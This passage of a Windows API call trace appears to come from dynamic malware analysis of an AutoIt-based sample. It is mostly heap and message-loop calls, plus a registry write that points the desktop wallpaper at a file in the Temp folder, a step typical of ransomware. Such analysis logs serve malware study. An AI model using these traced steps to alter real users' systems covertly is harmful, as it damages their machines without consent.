hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0285.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0285.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0285.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0285.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0285.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0285.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0285.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0285.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0285.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0285.312] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0285.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0285.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0285.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0285.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0285.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0285.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0285.313] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0285.314] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0285.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0285.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0285.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0285.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0285.314] timeGetTime () returned 0x1187727 [0285.314] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.314] Sleep (dwMilliseconds=0xa) [0285.519] timeGetTime () returned 0x11877f5 [0285.520] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.520] Sleep (dwMilliseconds=0xa) [0285.602] timeGetTime () returned 0x1187847 [0285.602] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.602] Sleep (dwMilliseconds=0xa) [0285.672] timeGetTime () returned 0x118788d [0285.672] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.672] Sleep (dwMilliseconds=0xa) [0285.743] timeGetTime () returned 0x11878d5 [0285.744] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.744] Sleep (dwMilliseconds=0xa) [0285.811] timeGetTime () returned 0x1187919 [0285.812] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.812] Sleep (dwMilliseconds=0xa) [0285.853] timeGetTime () returned 0x1187942 [0285.853] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0285.853] TranslateMessage (lpMsg=0x8cf798) returned 0 [0285.853] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0285.853] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0285.853] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0285.853] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.853] Sleep (dwMilliseconds=0xa) [0285.892] timeGetTime () returned 0x1187969 [0285.892] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.892] Sleep (dwMilliseconds=0xa) [0285.956] timeGetTime () returned 0x11879a9 [0285.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.956] Sleep (dwMilliseconds=0xa) [0285.995] timeGetTime () returned 0x11879d0 [0285.995] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.995] Sleep (dwMilliseconds=0xa) [0286.016] timeGetTime () returned 0x11879e5 [0286.016] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.016] Sleep (dwMilliseconds=0xa) [0286.054] timeGetTime () returned 0x1187a0b [0286.054] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.054] Sleep (dwMilliseconds=0xa) [0286.090] timeGetTime () returned 0x1187a2f [0286.090] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.090] Sleep (dwMilliseconds=0xa) [0286.125] timeGetTime () returned 0x1187a52 [0286.125] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.125] Sleep (dwMilliseconds=0xa) [0286.178] timeGetTime () returned 0x1187a87 [0286.178] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.178] Sleep (dwMilliseconds=0xa) [0286.212] timeGetTime () returned 0x1187aa9 [0286.212] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.212] Sleep (dwMilliseconds=0xa) [0286.250] timeGetTime () returned 0x1187acf [0286.250] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.250] Sleep (dwMilliseconds=0xa) [0286.292] timeGetTime () returned 0x1187afa [0286.292] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.292] Sleep (dwMilliseconds=0xa) [0286.329] timeGetTime () returned 0x1187b1f [0286.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0286.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0286.330] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0286.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0286.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0286.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0286.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0286.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0286.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0286.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0286.340] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0286.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0286.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0286.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0286.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0286.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0286.342] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0286.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0286.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0286.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0286.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0286.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0286.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0286.342] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0286.343] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0286.343] RegCloseKey (hKey=0x2d0) returned 0x0 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0286.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0286.343] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0286.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0286.344] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0286.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0286.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0286.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0286.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0286.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 